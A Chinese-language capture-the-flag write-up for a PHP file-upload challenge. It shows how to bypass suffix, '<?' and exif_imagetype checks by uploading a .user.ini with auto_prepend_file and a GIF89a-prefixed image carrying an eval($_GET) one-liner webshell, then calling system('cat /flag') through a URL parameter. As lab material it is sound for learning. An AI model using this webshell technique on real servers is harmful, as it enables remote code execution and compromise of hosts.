测试后一共有三种回显结果:
- <? in contents!表示 <?不能连续出现在文件中
- illegal suffix!表示 不能上传后缀为php、php4、php5、phtml等可直接被解析的PHP文件
- exif_imagetype:not image表示判断一个图片的类型(即读取一个图像的第一个字节并检查其签名)
解题思路
- 先上传一个.user.ini文件,.user.ini会将图片马中的代码包含到每个php文件中
- 再上传一个图片文件(图片中是php一句话木马)
Attention:
- 图片马可以是GET或者POST类型;GET类型直接在URL中传参,POST类型用剑蚁连接即可
- 图片马的文件名要和.user.ini包含的文件名一致
上传文件的内容如下:
- 使用GIF89a绕过exif_imagetype判断
- 使用<script>标签绕过对<?的检测
# .user.ini文件内容如下
GIF89a
auto_prepend_file=123.jpg
# 123.jpg文件内容如下
GIF89a
<script language=php>eval($_GET['cc123']);</script>
解题结果
- 上传两个文件之后回显文件上传路径
- 这里我们采用GET方式连接,构造URL,注意要在存储路径后面加index.php:
http://127.0.0.1:39001/uploads/5b02a1fb5a263b1ba6b075868c2849fa/index.php?cc123=system("cat /flag");
- 拿到flag:
